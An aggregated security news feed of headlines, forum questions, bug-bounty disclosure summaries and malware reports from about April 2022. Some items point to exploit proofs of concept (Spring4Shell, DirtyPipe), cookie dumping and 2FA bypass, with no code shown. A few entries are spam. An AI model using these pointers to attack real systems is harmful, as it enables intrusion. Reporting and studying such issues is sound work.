    Hi all - I have 3.5 years of a BS in Biology I couldn't graduate from because I had to take care of some medical affairs. I worked in medicine in many clinical roles for 7 or 8 years. So much BS in the health field had me running the other way. I found a job in tech sales, selling Tanium's cyber solution for almost a year. Then moved on to medical sales and have been doing that for almost 2 years now. I want to go back into cyber somehow, and am studying for Sec+. People tell me CCNA is the next most helpful cert to pick up for a job. Any advice for me in terms of job hunting? I am scared shitless I'll spend all this time getting certifications that nobody cares about. submitted by /u/verdite
    Significance of image and original filename?
    I am currently playing around with Sysmon on Windows, and can't really wrap my head around the significance of the "Image" and "OriginalFileName" fields. From what I understand, the image is a read-only copy of the executable at the time it is run (say, C:\Windows\System32\cmd.exe). The original file name is part of the PE header (and thus, if signed, it is protected by the signature). Say an attacker sends you cmd.exe and renames it to outlook.exe; the original file name will still be cmd.exe - the attacker cannot change this without invalidating Microsoft's signature. My question is, from a defender's perspective, should a mismatch between image and original file name always be an immediate red flag, or are there legit use cases where the two can differ? submitted by /u/usair903
  • Open

    Zyxel patches critical vulnerability that can allow Firewall and VPN hijacks
    Article URL: https://arstechnica.com/information-technology/2022/04/zyxel-patches-critical-vulnerability-that-can-allow-firewall-and-vpn-hijacks/ Comments URL: https://news.ycombinator.com/item?id=30918099 Points: 2 # Comments: 0
    macOS SUHelper Root Privilege Escalation Vulnerability: CVE-2022-22639
    Article URL: https://www.trendmicro.com/en_us/research/22/d/macos-suhelper-root-privilege-escalation-vulnerability-a-deep-di.html Comments URL: https://news.ycombinator.com/item?id=30915803 Points: 2 # Comments: 0
  • Open

    DirtyPipe for Android
    Dirty Pipe (CVE-2022-0847) temporary root PoC for Android. Dirty Pipe root exploit for Android (Pixel 6) Targets Continue reading on Medium »
    Bug Bounty: How to get private invites
    Now I know that a lot of people will not like this answer and you certainly do not have to follow this method if you don’t wish to. Continue reading on Medium »
    CVE-2022-21907
    CVE-2022-21907: detection, protection, exploitation and demonstration. Exploitation: Powershell, Python, Ruby, NMAP and Metasploit… Continue reading on Medium »
    Spoof as another Facebook user to report an impostor account
    When I was helping someone take down a poser/impostor account, I tried to check the request body to see what's going on behind the scenes. The… Continue reading on Medium »
  • Open

    Pyramid Of Pain
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    FreeBuf Morning Report | Some cloud memorial (online grave-sweeping) apps infringe on privacy; US State Department establishes Bureau of Cyberspace and Digital Policy
    On April 4 local time, the US State Department announced the establishment of its first Bureau of Cyberspace and Digital Policy (CDP), which emphasizes digital modernization in the federal domain.
  • Open

    SQL Injection at https://files.palantir.com/ due to CVE-2021-38159
    Palantir Public disclosed a bug submitted by haxor31337: https://hackerone.com/reports/1525200 - Bounty: $5000
    Private invitation links/tokens leak to third-party analytics site
    HackerOne disclosed a bug submitted by bigbug: https://hackerone.com/reports/1491127 - Bounty: $500
  • Open

    MacBook Pro M1 2021 with FileVault enabled, how long would it take to bruteforce the password?
    How long would it take to bruteforce an 18 character long password with numbers, caps and symbols, on a MacBook Pro that has FileVault enabled? submitted by /u/huffilyvest28

  • Open

    Using open sources (OSINT) to find the location of the videos from Bucha, Ukraine
    In recent days we have followed the news about the massacre carried out by the Russians in Bucha, Ukraine. The newspapers reported that the… Continue reading on Medium »
    Ukraine — Situation update as of April 5
    The last 24 hours Continue reading on Medium »
  • Open

    What certifications would I need to get a job as a security analyst?
    I'm soon starting a job as a support engineer. So not IT. I want to move into a security analyst position. I'm open to other roles but I think this would be a good start. I'm thinking I'll get Security+ first, but don't know where to go from there. I don't think I have the offensive security skills for OSCP quite yet. submitted by /u/Throwaway_deafgrape
    Are hosted password managers safe?
    AFAIK all hosted password managers (Bitwarden, LastPass, Roboform, ...) are based on a master password. That master password you enter on their website. What is stopping these companies / password managers from snooping that password or actually being able to decrypt **all** your passwords that are saved on their servers? I'm not talking about e.g. KeePass and managing the password store yourself, or self-hosting Bitwarden. Maybe I am missing something, like local hashing of the master password, but am I mistaken that all hosted password managers suffer the same flaw? They could all have some method to decrypt my password stores because I just don't know what's happening on their servers? submitted by /u/moontear
    Best resource today for learning reverse engineering?
    Hey you guys, I'm tasked with learning reverse engineering, and I'm wondering what's the best, relevant and up-to-date resource for doing this. I should mention I am already familiar with assembly and have read Practical Malware Analysis in the past, so I have the fundamentals. I also watched a few related courses on Pluralsight in the past few days, but I still feel like I am nowhere near proficient or knowledgeable enough to reverse binaries on my own. Suggestions? Thanks a lot! submitted by /u/Altiverses
    Dynamic SSH for Multiple Remotes
    I'm configuring an architecture where a client workstation sends commands to a server within my LAN. That server, in turn, is responsible for communicating with many different base stations. The issue is the server-to-base station communication is unencrypted. Is a Dynamic SSH/SOCKS proxy server the answer to this? I envision a client sending commands to a known port on the server, the server forwarding the commands to the SOCKS proxy running locally, and the proxy transmitting the commands through an SSH tunnel to the requisite external IP:PORT combination. My gap in understanding is that the SOCKS proxy will need to communicate with several remote hosts. I'm just not sure if this is the right approach, or if the syntax supports this. These remote hosts all have SSH enabled, so this appears to be the most lightweight solution. submitted by /u/InfamousClyde
    Apple's Vulnerability Patch
    I'm a student studying security! Apple says it has urgently released two zero-day patches that affect MacOS and iOS. These are likely to be abused and are said to allow threatened parties to interfere with or access kernel activities. Apple has released additional security updates for vulnerabilities and macOS failures affecting both macOS and iOS. Their discovery is said to have been made by anonymous researchers. MacOS and iOS AVD components allow applications to execute arbitrary code with kernel privileges. Does anyone know more about this? submitted by /u/zwrinerlucas
    Moving from Web application pentesting to mobile.
    As I've become familiar with web app penetration testing, now the company is moving to mobile. What's the process like? Can you share some materials or methodologies which can be useful? I have zero experience with mobile app exploitation and absolutely no idea about how it should go. Thanks! submitted by /u/tryingtoworkatm
  • Open

    WordPress Overtakes Magento in Credit Card Skimmers
    One of the most important monitoring tools in our security platform is our Sucuri SiteCheck scanner. It’s a free tool to scan your website for known malicious content and malware injections. The usage of SiteCheck also allows us to monitor trends in the website security landscape, and one of the things that it can spot are JavaScript-based credit card skimmers, often referred to in the security community as #MageCart infections. MageCart derives its name from the eCommerce CMS platform Magento, which we’ve written about extensively on this blog. Continue reading WordPress Overtakes Magento in Credit Card Skimmers at Sucuri Blog.
  • Open

    Countries’ vulnerability to food trade shocks from network-based simulations
    Article URL: https://www.nature.com/articles/s41598-022-08419-2 Comments URL: https://news.ycombinator.com/item?id=30910793 Points: 2 # Comments: 0
    Researchers uncover a hardware security vulnerability on Android phones
    Article URL: https://techxplore.com/news/2022-04-uncover-hardware-vulnerability-android.html Comments URL: https://news.ycombinator.com/item?id=30907952 Points: 1 # Comments: 0

    a ton of general stuff
    https://download.tuxfamily.org/ submitted by /u/heywhatsyournam [link] [comments]

    (SQLI) How I Hacked Hundreds of Students' Data on a Government Website
    Hola everybody, short story: when I was browsing a government website I found a search bar, and the first thing that came to my mind was “SQL INJECTION”. Continue reading on Medium »
    Oda is launching our bug bounty program!
    We’re super proud to announce to the world that we are launching our official bug bounty program. While we always aim to establish the… Continue reading on Oda Product & Tech »
    My Pentest Log -13- (Bypass Renaming on File Upload)
    Greetings from the Hippodrome everyone, Continue reading on Medium »
    HACKED NOKIA WITH REFLECTED CROSS-SITE SCRIPTING VULNERABILITY….
    Hello, Hackers Welcome to my other write-up of Nokia Hacked with RXSS Vulnerability… Continue reading on Medium »
    2FA… To Bypass
    Learn various ways to bypass 2FA Continue reading on Medium »

    SecWiki News 2022-04-04 Review
    Generate all call graph for Java Code by ourren; Detection and defense approaches for cryptomining by ourren; Hiding Cobalt Strike behind a CDN and masking its signatures by ourren; SecWiki Weekly (Issue 422) by ourren. For more of the latest articles, visit SecWiki.

    OAST (Out-of-band Application Security Testing)
    🔍 Introduction OAST stands for Out-of-band Application Security Testing and refers to a security testing method that uses OOB (Out-Of-Band) channels. OOB by itself does not constitute a security issue, but it is a highly useful analysis method for identifying blind-class vulnerabilities (Blind RCE, Blind XSS, Blind SSRF, etc.) or for detecting the exfiltration of sensitive information. OAST is also chosen as a primary scan model in DAST (Dynamic Application Security Testing) tools such as ZAP and Burp, and it has a significant effect on real scan performance (a higher detection rate). 🗡 Offensive techniques ZAP In ZAP, you can obtain an OAST domain and poll it through the OAST menu.

    TruffleHog V3: Automatically validate over 600 API Keys
    submitted by /u/wifihack [link] [comments]
    Discovering Vulnerabilities in WordPress Plugins at Scale
    submitted by /u/jonas02 [link] [comments]
    Dockerized Spring4Shell Exploit Proof of Concept
    submitted by /u/sciencestudent99 [link] [comments]

    [api.krisp.ai] Race condition on /v2/seats endpoint allows bypassing the original seat limit
    Krisp disclosed a bug submitted by alp: https://hackerone.com/reports/1418419 - Bounty: $100

    Log Poisoning — Inject payloads in logs
    No content preview
    TryHackMe writeup: Game Zone
    No content preview

    Exploiting Insecure Docker Registry
    submitted by /u/tbhaxor [link] [comments]
    Dockerized Spring4Shell Exploit Proof of Concept
    https://github.com/FourCoreLabs/spring4shell-exploit-poc submitted by /u/sciencestudent99 [link] [comments]


    Road to Go Pro — Special Edition: Fuzzing
    In this special edition, we are going to learn the new testing feature: fuzzing. I will share my thoughts on this feature in this story. Continue reading on Level Up Coding »

    Vulnerability Excel template?
    I'm looking for a generic vulnerability register excel template to track risks within a number of products and some vulnerabilities outside of the products on the operational side of things. It seems like this should be a solved problem but Google isn't turning up any good results, any recommendations? We do have jira for when we want to actually schedule the work but due to the permissions setup and config I'd rather just keep that for work that is actively being worked on rather than cataloguing all vulnerabilities. submitted by /u/dbxp [link] [comments]
    Network support to security?
    Network Engineer to Security I am a network engineer at Cisco CCNP level. I had my security+ but it expired and I’ve always been interested in security but never nerded out on hack the box or anything. I want to transition from network support / engineering to cyber security but there are so many fields I’m having trouble. I know that since I have a deep background in core networking stuff network security makes sense for me, so I’m wondering if oscp is too app / windows at an enterprise focused. I kind of just want to pick a well respected cert and do it to completion cause I like following curriculums. I can learn on my own fine don’t mind cracking into a book but I like the organized start to finish and walk away with something that shows your time and effort structure of certifications. I like the syllabus of PWK for the most part I just don’t know if there’s a better path / course for me to take. I do meet all the prerequisite they say you need. My rough plan would be something like OSCP to transition from my current support role at large network vendor for Datacenter route switch, then after 1-2 years in a real security role, CISSP then consulting / management. I currently make $98k in networking, do you guys think I can jump to 120-130k if I get OSCP? submitted by /u/bearlapa [link] [comments]
    Now what?
    Finishing up a 14-week cybersecurity bootcamp, passed my CySA+ and got a pending 6-12 month contract as a Junior Analyst. My foot is officially in the door and I’m excited to get some hands on experience. That said, what are some “next steps” I should be focusing on to study or work towards? What other options beyond PenTesting are there after you’ve put in your time as a SOC grunt sifting through logs? I’m eager to just be making the transition into CyberSec, but want to keep the momentum and drive going and I’m curious what sort of roadmap others might suggest. Thanks! submitted by /u/DirtyMetis [link] [comments]

    A step-by-step analysis of the Russian Turla backdoor called TinyTurla
    submitted by /u/CyberMasterV [link] [comments]

    SecWiki News 2022-04-03 Review
    Learning how to do security research from DARPA projects by ourren; Fooling the Wappalyzer plugin's fingerprinting by tmr. For more of the latest articles, visit SecWiki.

    Downloading of YT videos with search criteria
    Does anyone have a suggestion for a quick solution to download videos with specific surname in title before they are taken down? After this massacre in Ukrainian town Bucha I am afraid some prominent people will want to remove evidence for their support of this war. There is a particular mathematician I would like the world to remember. Some of his videos are already gone. submitted by /u/Base88Decode [link] [comments]

    Image & Geospatial OSINT
    No content preview
    API authentication bypass on National Informatics Centre
    No content preview
    Finding Vulnerable Info Using Google Dorks — Ethical Hacking
    No content preview

    HACKED INSTAGRAM HANDLE OF SAMSUNG….
    Hello, Hackers Welcome Back to my Stored Link Hijacking Scenario... Continue reading on Medium »
    OOB & Blind Testing using DNS Exfiltration
    Previous: Private Burp Collaborator Continue reading on Medium »
    Albus Security Trainee Application
    Hi Medium folk, before we start I'll introduce myself. So I’m Aniket Tyagi and I’m an Information Technology officer at the 5f eco… Continue reading on Medium »

    I'm trying to read some logs but almost all of them have these characters all throughout the logs. Why might this be the case and is there anyway of reading it in properly?
    submitted by /u/finnster145 [link] [comments]
    Windows Forensics Roadmap
    What is the best approach to learn and practice Windows forensics? Is there any effective roadmap including books, courses, practice website, etc… submitted by /u/BFF100F0 [link] [comments]
    Via the command line, can you search a forensic image and pull out files?
    Had some ideas to make life easier around the office. I wanted to use PowerShell (or software that is CMD based) to search an E01 file and pull out specific files in set locations. Effectively like any other GUI based viewer such as FTK imager (but via command line instead.) I don't know of any software/scripts that allow me to do this? any advice? An alternative is, I could auto mount an E01 file with some software, and then search the mounted file system for artefacts in set locations such as prefetch files. then export them to my workstation. What do you think? Cheers! submitted by /u/GEAR-IT-UP [link] [comments]

    Broken Domain Link Takeover from kubernetes.io docs
    Kubernetes disclosed a bug submitted by 0xlegendkiller: https://hackerone.com/reports/1434179 - Bounty: $100


    Is there any good friendly conference for sharing security knowledge such as incident response or automation?
    As the title says, are there any friendly conferences suitable for sharing security knowledge such as security automation? (besides Black Hat and DEF CON) submitted by /u/Calm_Scene [link] [comments]
    How valuable is the Certificate of Cloud Security Knowledge (CCSK)?
    Hi, I have been working in the cybersecurity space for around 2 years now and have now decided to go for this cert: Certificate of Cloud Security Knowledge (CCSK) If and when I do complete the CCSK, how valuable will this be for future job prospects? Thanks submitted by /u/securm0n [link] [comments]
    Syn flooding one port?
    So I’m analyzing a Wireshark PCAP, and I’m dumbfounded as to what is going on; maybe someone here can help. So I’m analyzing a lot of packets from one machine to another. These are the same machines over and over. It seems like one machine is targeting port 636 over TCP. It looks like an Nmap SYN scan, except that the initiating machine keeps changing the ports it uses while targeting one single port on the other machine. So it goes like this (X == random port):
    A:X [SYN] >> B:636
    B:636 [SYN, ACK] >> A:X
    A:X [ACK] >> B:636
    A:X [TLSv1 Client Hello] >> B:636
    B:636 [RST, ACK] >> A:X
    Then it will repeat, but X increments by 1. Anyone familiar with this type of pattern that can shed some light? I have no idea what this even is. I know port 636 is LDAP but I can’t figure out what the inquiring machine (A) is doing; I don’t know any scans that actively target only one port. Anyway, any help is greatly appreciated. submitted by /u/Forsaken-Summer-4844 [link] [comments]

    Introducing PacketStreamer - packet capture for Kubernetes and other platforms
    submitted by /u/foobarbazwibble [link] [comments]
    DoS vulnerability in firmware v3.0.3 of KNXnet/IP Secure router SCN-IP100.03
    submitted by /u/robertguetzkow [link] [comments]

    Ukraine — Situation report as of April 3
    The last 24 hours Continue reading on Medium »
    War in Ukraine / April 1
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    Image & Geospatial OSINT
    In this article, I learn how to use Open Source Intelligence (OSINT) techniques and tools to gather information from image or video files… Continue reading on InfoSec Write-ups »
    How to identify fake photos and videos?
    I publish simple and free tools for verifying (checking) photographic and video content posted in the news. Continue reading on Medium »
    Search by nickname and username
    Today we will analyze the topic of checking nicknames in the process of OSINT research. Did you know that the average person usually has… Continue reading on Medium »

    MULTIPLE TIMES I HACKED DUKE UNIVERSITY WITH RXSS VULNERABILITY!!!
    I’m Going to share one of my other Reflected Cross-Site Scripting Scenario. Continue reading on Medium »
    Design Flaw — A Tale of Permanent DOS
    This is my first writeup here on medium. Hope you enjoy it :). Feedbacks are always appreciated! Continue reading on Medium »
    Cross Site Scripting (XSS) for Dummies
    Hello everyone, my name is Кристиян Радев but many of you may know me as CypherTheThird. I have been studying ethical hacking for a while… Continue reading on Medium »
    Oceanland Testnet Bug Bounty Program
    Early bird catches the worm 🐛 Continue reading on Medium »
    SCENARIO OF REFLECTED CROSS-SITE SCRIPTING VULNERABILITY $$$$
    Today I’m going to share one of my RXSS Scenarios. Continue reading on Medium »
    Manager From Hackthebox
    Part Of Intro to Android Exploitation Continue reading on InfoSec Write-ups »
    View Friends List of any users using “View as” | Facebook Bug bounty
    Hello guys, Continue reading on Medium »
    (READ-PDF!) You’re My Little Cuddle Bug Full
    You’re My Little Cuddle Bug Read Online    Download Link => You’re My Little Cuddle Bug     Book description  Celebrate your little cuddle… Continue reading on Medium »
    Immunefi and the Stacks Foundation launch a bug bounty program
    Immunefi and the Stacks Foundation have launched a bug bounty program. Continue reading on Medium »

    Lots of NSFW videos. Lots.
    submitted by /u/brother_p [link] [comments]

    Found a useful Open Source Security Guide
    submitted by /u/Khaotic_Kernel [link] [comments]

    FTK Imager unavailable?
    I was going to download FTK imager today, but the download link on both accessdata.com and exterro.com are broken. I went to their Twitter to check if there was any info there, but @AccessDataGroup is suspended and no info on @exterro. What's going on? submitted by /u/Bulletorpedo [link] [comments]
    Help with identifying names of transferred files
    I am trying to identify exactly what files the attacker transferred from his work PC to his USB drive. I have access to the registry hives of the attacked machine and a vhdx file which I can mount and explore. The vhdx contains system logs in /System32/winevt/logs. Among those logs are Security.evtx, System.evtx and a bunch of others. I know the GUID of the USB that was used. The USB was encrypted with VeraCrypt. I know the drive letters on which the USB was connected to the machine. I am trying to find all files that exist or existed on this USB. I tried to analyze the Security.evtx file with Windows Event Viewer and filtered for ID numbers 4656, 4660, 4663, 4670 but with no success. What am I doing wrong and what would be your methodology? submitted by /u/threepairs [link] [comments]
    How does computer forensics people deal with amnesic systems like Tails?
    I used to use Tails when I lived in China because I was too cheap to get a VPN (I ended up getting one anyway because Tails is soooo slow). I still use it sometimes here back home in Sweden because it kind of makes me feel like a haxor. Tails is supposedly completely amnesic and leaves 0 trace on the system after you've used it and shut it down. In Sweden, you need "physical" evidence to convict someone of a cyber crime. Just having logs of a specific IP doing something is (as far as I know) not enough; you also need logs or files etc. on the suspect's computer proving that the person did what they did. For example, if they have tracked that a specific IP address is buying illegal drugs, they also need to find evidence on the suspect's computer of illegal activity. If Tails really is completely amnesic, would that not mean that it's impossible to convict Tails users of cyber crimes in countries with the same laws as Sweden unless you actually swat them and catch them in the act before they can shut it down? submitted by /u/CompoteDizzy [link] [comments]

    RCE vulnerability with Java Spring framework (CVE-2022-22965)
    Article URL: https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement Comments URL: https://news.ycombinator.com/item?id=30890139 Points: 1 # Comments: 0
    How The Tables Have Turned: Analysis of Linux CVE-2022-10{15,16} in nf_tables
    Article URL: https://blog.dbouman.nl/2022/04/02/How-The-Tables-Have-Turned-CVE-2022-1015-1016/ Comments URL: https://news.ycombinator.com/item?id=30886025 Points: 1 # Comments: 0

    Shibboleth writeup | HackTheBox
    Shibboleth writeup | HackTheBox Continue reading on Medium »
    Remotely Dumping Chrome Cookies…Revisited
    TL;DR Security researcher Ron Masas (twitter: @RonMasas) recently wrote a tool (chrome-bandit) that extracts saved passwords from… Continue reading on Medium »

    SecWiki News 2022-04-02 Review
    Anonymity protection and its adversaries in cryptocurrency contract trading by ourren; XNU Virtual Memory Security: A Look Back by ourren. For more of the latest articles, visit SecWiki.

    CSRF token validation system is disabled on Stripe Dashboard
    Stripe disclosed a bug submitted by d_sharad: https://hackerone.com/reports/1483327 - Bounty: $2500

    Advanced Docker Security
    No content preview
    Manager From Hackthebox
    No content preview

    Beginning reverse engineering and exploitation
    Hello, I'm a 21 year old finishing his computer science university degree. I've always been fascinated by security and after having a look around, the two areas that intrigue me are reverse engineering/malware analysis and exploitation in general. The entry barriers in both these fields are very high and the learning curve is very steep. I've seen the pwn2own videos for exploitation and oalabs for malware analysis and, I have to admit it, I understood like less than 5% of what they said, so it'll be a lot of work.
    I've done some research and I came up with a roadmap for reverse engineering/malware analysis:
    - C/C++ and Assembly (for asm I think it's best to start with a simple architecture, like MIPS, then move into x32/x64)
    - start writing small programs and reverse them using both a debugger/disassembler, learning about how they translate into assembly
    - learn about common malware techniques: unpacking, persistence techniques, process injection, obfuscation, building a sandbox, building a honeypot for capturing samples and so on.
    The problems start with exploitation; here I am completely lost. I was able to find some basic explanations and tutorials about buffer/heap overflows, integer overflow, double free, use after free, null pointer dereference. It seems however that going from theory to practice is very, very hard. Another subject that goes hand in hand with exploitation is fuzzing, which of course I don't understand.
    Last thing, I've seen a blog post where someone was able to get code execution on a program using DLL sideloading; is this related to exploitation?
    What resources, courses, books, tips, tricks can I follow in order to get better and better in these two fields? Last but not least, English is not my mother tongue, sorry for any mistakes. Thanks for taking your time to read and for an eventual reply, have a good day ahead! submitted by /u/worldpwner [link] [comments]

    Major news: CSRC revises confidentiality and archive management rules for domestic enterprises listing overseas
    The Provisions comprise thirteen articles, further clarify enterprises' information security responsibilities, and give domestic enterprises and institutions clearer guidance on confidentiality and archive management during overseas securities offerings and listings.
    EU draft law adds security checks to all crypto transactions
    The European Parliament recently took a solid first step toward new anti-money-laundering legislation; the new proposal mainly targets cryptocurrency transactions.
    GitLab vulnerability allows attackers to take over user accounts
    A vulnerability was disclosed in GitLab and has now been fixed.
    Major Wyze camera vulnerabilities took nearly three years to fix
    Wyze Cam was found to have three serious security vulnerabilities that let attackers execute arbitrary code, take full control of the camera, and access video stored on the device.
    Jie Ge teaches you to extract IoCs from Emotet's malicious Excel spreadsheets with Python
    Jie Ge teaches you to build a threat-intelligence extraction tool in Python: the Emotet initial macro-code Excel spreadsheet
    IT services giant hit by ransomware attack, losses exceed $42 million
    A leading Spanish business process outsourcing (BPO) provider says a ransomware attack caused it losses of tens of millions of dollars.

    XNU Virtual Memory Security: A Look Back
    Author: Wang Tielei. Original link: https://mp.weixin.qq.com/s/Lj8c5PLzLGIfdBoDzairsQ 1 Introduction The virtual memory (VM) subsystem is a fundamental core component of modern operating systems. It not only maintains the mapping between virtual addresses and physical memory, manages and schedules the use of physical memory, and gives program developers a uniform, transparent address space; it also provides isolation between different execution environments and controls read, write and execute permissions on physical pages, making it the foundation of system secu...
    CVE-2022-26503 Veeam Agent for Microsoft Windows LPE
    Author: Y4er. Original link: https://y4er.com/post/cve-2022-26503-veeam-agent-for-microsoft-windows-lpe/ Following the previous article. Vulnerability analysis. Patch: Veeam.Common.Remoting.CSrvTcpChannelRegistration.CSrvTcpChannelRegistration(string, int, CSrvTc...
    CVE-2022-26500 Veeam Backup & Replication RCE
    Author: Y4er. Original link: https://y4er.com/post/cve-2022-26500-veeam-backup-replication-rce/ Saw another CVE blow up on Twitter; it looked like a pretty impressive bug, so I took a look. Official advisory: https://www.veeam.com/kb4288 The Veeam Distribution Service (TCP 9380 by default) all...

    WordPress Popunder Malware Redirects to Scam Sites
    Over the last year we’ve seen an ongoing malware infection which redirects website visitors to scam sites. So far this year our monitoring has detected over 3,000 websites infected with this injection, and over 17,000 in total since we first detected it in March of 2021. The reported behaviour is always the same: after a few seconds of loading, the website will redirect to a dodgy scam site.
    Checking the Payload: The malware is always injected into the active theme’s footer.php file, and contains obfuscated JavaScript after a long series of empty lines, no doubt trying to stay hidden. Once we de-obfuscate this we see the following excerpt of the malicious code: The attackers are frequently adjusting the injection ever so slightly, but we notice the same domains over and over again initiating the redirect: amads[.]fun, techmarket[.]ink, uads[.]shop, 5[.]188[.]62[.]157, uads[.]live, like-a-dating[.]top, techmarket[.]ink.
    Source of Infection? Continue reading WordPress Popunder Malware Redirects to Scam Sites at Sucuri Blog.

    LayerZero Security Update — April 2022
    If this past week has shown us anything, it’s that there is nothing more critical in this space than an absolute commitment to… Continue reading on LayerZero Official »
    Community-Owned Bug Bounties
    Hacks have become the new norm in crypto; from Twitter jokes about getting rugged, to sad posts about people losing their most prized… Continue reading on Medium »
    Small bugs are more dangerous than you think
    Chaining bugs for the win Continue reading on Medium »
    AlbusSec:- Penetration-List 05 Cross-Site-Scripting (XSS) — Part 2
    Hello Everyone, I hope you liked our previous article that was Cross-Site-Scripting (XSS) — Part 1, On that article, you learned about… Continue reading on Medium »
    My First RCE from N/A to Triaged (CVE-2021–3064)
    Hello hackers, my name is Vivek Kumar & I started my bug bounty journey 8 months ago. Let's get back to the RCE; it's gonna be a very short blog… Continue reading on Medium »
    Enter the Crow Games for the opportunity to earn NFTs!
    Complete some tasks, tell us about it, and join the Crow Clan!  After our recent airdrop of the crow clan NFT we have decided to grow the… Continue reading on Medium »
    Ambassador World Cup 2022 CTF
    This CTF was fun and informative that could help you develop your methods in finding security misconfiguration on websites. Continue reading on Medium »

    Workspace configuration metadata disclosure
    Slack disclosed a bug submitted by kadusantiago: https://hackerone.com/reports/864489 - Bounty: $3500
    Subdomain Takeover on proxies.sifchain.finance pointing to vercel
    Sifchain disclosed a bug submitted by hrdfrdh: https://hackerone.com/reports/1487793 - Bounty: $100
    CVE-2022-24288: Apache Airflow: TWO RCEs in example DAGs
    Internet Bug Bounty disclosed a bug submitted by happyhacking123: https://hackerone.com/reports/1492896 - Bounty: $4000

    Ukraine — Situation report as of April 2
    The last 24 hours Continue reading on Medium »
    Create Your Own Internet Archive — ArchiveBox
    Since 1996, the Internet Archive has been actively serving this purpose. What does it do? It keeps an archive of the things that were once found on… Continue reading on Medium »
    War in Ukraine / March 30
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    Logging network users in OSINT
    Logging or establishing information about the device and connection of an Internet user is an important part of the process of… Continue reading on Medium »
    Telltale Signs of Russian Disinformation
    A wave of #disinformation emerged since Russia invaded Ukraine. Part 1 of a guide on how to take examples apart with #OSINT Continue reading on Medium »
    How to extract information from PGP public keys
    In this article we will talk about how to extract information from a PGP public key. Continue reading on Medium »
    Find users by password and PGP key
    Today we’ll talk about how to identify an anonymous email user using a leaked password from it, as well as a PGP public key. Continue reading on Medium »

    CVE-2017-16995 Ubuntu local privilege escalation test (arbitrary address read/write exploitation)
    The vulnerability exists in Linux kernels compiled with eBPF bpf(2) system call support (CONFIG_BPF_SYSCALL) and is an arbitrary memory read/write flaw.
    lazysysadmin practice range
    Continuing with practice ranges today; this one is not hard, but it took me a whole day and I feel the author tricked me.
    Vulnerability notes: PDA and Anchor account validation, seen through the Jet Protocol arbitrary-withdrawal vulnerability
    Several hacks on Solana so far have all been related to account validation problems; the SlowMist security team reminds Solana developers to rigorously review their account systems.
    FreeBuf Morning Report | Russia used AcidRain to attack US-based ViaSat; Wyze camera vulnerability allows access to video feeds
    SentinelLabs researchers found that US satellite communications provider Viasat suffered a cyberattack that caused service outages in Central and Eastern Europe.
    Knownsec Blockchain | March security monthly report
    The number of security incidents in March hit a new high for 2022, causing a staggering loss of over $700 million!
    Detailed walkthrough of penetrating the Driftingblues-1 target machine
    A detailed walkthrough of penetrating the Driftingblues-1 target machine, shared for learning.
    Research on Java deserialization echo chains: engineering vulnerability detection
    Research on Java deserialization echo chains: engineering vulnerability detection, shared for learning.
    Anonymous claims to have breached Russian company Thozis, did not attack Rosaviatsia
    The hacker collective Anonymous continues to carry out cyberattacks against Russian entities and foreign private companies operating in the country.
    Apple releases emergency patches for actively exploited zero-day vulnerabilities
    Apple has released an emergency security patch addressing two zero-day vulnerabilities actively exploited to compromise iPhones, iPads and Macs.
    WAFNinja: a penetration testing tool for bypassing WAFs
    When doing penetration tests, we inevitably run into all kinds of WAFs blocking us.
    FreeBuf Weekly | Meta hiring a firm to attack TikTok raises data privacy concerns; Spring vulnerability patch released
    Happy weekend, FreeBufers! Below is this week's FreeBuf Weekly, in which we summarize and recommend the week's hot news, quality articles and handy tools so that nobody misses any of the week's highlights. Hot news: 1. The China National Vulnerability Database (CNVD) has catalogued the Spring Framework remote command execution vulnerability; security patch released. 2. Facebook's algorithm kept pushing bad content for half a year due to a bug. 3. The Washington Post published a long piece criticizing Meta for hiring a firm to attack TikTok, raising data privacy concerns. 4. WordPress sites hacked, ...
    Draft for comment published: "Information security technology: Technical specification for trusted identity authentication of calling users based on cryptographic tokens" and others
    Drafts for comment of four national standards have been published for nationwide public consultation.
    Answers and explanations for a certain company's 2016 security technology internship recruitment test
    Since I once took the Tencent recruitment written test for security technology, I am leaving this note as a memento.
    OpenSSL infinite-loop vulnerability affects QNAP NAS devices
    If exploited, the vulnerability would allow an attacker to carry out a denial-of-service attack.
    FBI investigating more than 100 ransomware variants
    The FBI has launched investigations into more than 100 different ransomware variants and found that many of them have been used in various ransomware campaigns.
    FreeBuf Morning Report | CNVD catalogues Spring vulnerability, patch released; Facebook algorithm bug persisted for half a year
    On March 30, the China National Vulnerability Database (CNVD) catalogued the Spring Framework remote command execution vulnerability (CNVD-2022-23942).

    AD Series | DC Sync Attacks
    DCSync Attack is a type of “credential dumping” attack that makes use of commands present in Microsoft Directory Replication Service… Continue reading on Medium »
    Prologue to Red Hat hackers in Cyber Security
    What are Red hat hacker or Red Team? Continue reading on Medium »
    HackTheBox Delivery Writeup
    Hello, I want to share how I solved the HackTheBox Delivery box. This box is fun and easy. Continue reading on MII Cyber Security Consulting Services »
    HackTheBox Ready Writeup
    Hello, I want to share how I solved the HackTheBox Ready machine. This box needs a bit more research to analyze, and is fun. Continue reading on MII Cyber Security Consulting Services »
    HackTheBox — ScriptKiddie Writeup
    The first step is to run nmap to find out which ports are open, because the IP address 10.10.10.226 does not… Continue reading on MII Cyber Security Consulting Services »
    HackTheBox — Passage Writeup
    IP : 10.10.10.26 Continue reading on MII Cyber Security Consulting Services »

    CVE 2022-22965 (Spring4Shell) Vulnerability
    On March 29, 2022, a security researcher with the handle p1n93r disclosed a Spring Framework remote code execution (RCE) vulnerability, which was archived by vx-underground. This vulnerability, known as Spring4Shell, affects applications that use JDK v9 or above that run Apache Tomcat as the Servlet Container in a WAR package and use dependencies of the... The post CVE 2022-22965 (Spring4Shell) Vulnerability appeared first on TrustedSec.

    SecWiki News 2022-04-01 Review
